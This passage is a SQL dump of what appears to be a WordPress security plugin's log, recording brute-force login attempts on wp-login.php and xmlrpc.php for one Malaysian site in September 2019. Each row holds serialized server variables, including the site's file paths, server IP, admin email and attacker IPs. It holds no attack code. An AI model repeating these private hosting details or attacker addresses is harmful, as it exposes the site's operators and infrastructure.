03:26:59',18257432,19554576,'https://bintara.com.my/xmlrpc.php',1,0,'103.229.72.84'),(23792,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.229.72.84\";s:11:\"REMOTE_PORT\";s:5:\"36558\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2vgJ3S-xk3mIlSDSjdNQAAAA0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568518016.313\";s:12:\"REQUEST_TIME\";s:10:\"1568518016\";}}','notice','2019-09-15 03:26:57','2019-09-15 03:26:56',17738768,19229152,'https://bintara.com.my/wp-login.php',1,0,'103.229.72.84'),(23791,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"119.28.180.62\";s:11:\"REMOTE_PORT\";s:5:\"34796\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2stVNglnLNtPb4Wmx58QAAAUM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568517302.0677\";s:12:\"REQUEST_TIME\";s:10:\"1568517302\";}}','notice','2019-09-15 03:15:04','2019-09-15 03:15:02',18257632,19556032,'https://bintara.com.my/xmlrpc.php',1,0,'119.28.180.62'),(23790,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"119.28.180.62\";s:11:\"REMOTE_PORT\";s:5:\"34394\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2ss-Pfj5xLH6d8s95Z8AAAAIc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568517299.5271\";s:12:\"REQUEST_TIME\";s:10:\"1568517299\";}}','notice','2019-09-15 03:15:00','2019-09-15 03:14:59',17739336,19230272,'https://bintara.com.my/wp-login.php',1,0,'119.28.180.62'),(23789,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.133.250\";s:11:\"REMOTE_PORT\";s:5:\"44754\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2nkJ3S-xk3mIlSDSjWjgAAAAQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568515984.8851\";s:12:\"REQUEST_TIME\";s:10:\"1568515984\";}}','notice','2019-09-15 02:53:06','2019-09-15 02:53:05',18257160,19556520,'https://bintara.com.my/xmlrpc.php',1,0,'128.199.133.250'),(23788,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.133.250\";s:11:\"REMOTE_PORT\";s:5:\"44424\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2njp3S-xk3mIlSDSjWiwAAABI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568515982.6691\";s:12:\"REQUEST_TIME\";s:10:\"1568515982\";}}','notice','2019-09-15 02:53:04','2019-09-15 02:53:03',17908992,19232040,'https://bintara.com.my/wp-login.php',1,0,'128.199.133.250'),(23787,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.133.250\";s:11:\"REMOTE_PORT\";s:5:\"44424\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2njp3S-xk3mIlSDSjWiwAAABI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568515982.6691\";s:12:\"REQUEST_TIME\";s:10:\"1568515982\";}}','notice','2019-09-15 02:53:04','2019-09-15 02:53:03',17746280,19232040,'https://bintara.com.my/wp-login.php',1,0,'128.199.133.250'),(23786,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"148.72.211.251\";s:11:\"REMOTE_PORT\";s:5:\"38970\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2lG53S-xk3mIlSDSjUEAAAABQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568515355.7852\";s:12:\"REQUEST_TIME\";s:10:\"1568515355\";}}','notice','2019-09-15 02:42:37','2019-09-15 02:42:36',18257152,19556184,'https://bintara.com.my/xmlrpc.php',1,0,'148.72.211.251'),(23785,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"148.72.211.251\";s:11:\"REMOTE_PORT\";s:5:\"38240\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2lF1NglnLNtPb4Wmx3cQAAAUw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568515352.0224\";s:12:\"REQUEST_TIME\";s:10:\"1568515352\";}}','notice','2019-09-15 02:42:35','2019-09-15 02:42:33',17908744,19234264,'https://bintara.com.my/wp-login.php',1,0,'148.72.211.251'),(23784,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"148.72.211.251\";s:11:\"REMOTE_PORT\";s:5:\"38240\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2lF1NglnLNtPb4Wmx3cQAAAUw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568515352.0224\";s:12:\"REQUEST_TIME\";s:10:\"1568515352\";}}','notice','2019-09-15 02:42:34','2019-09-15 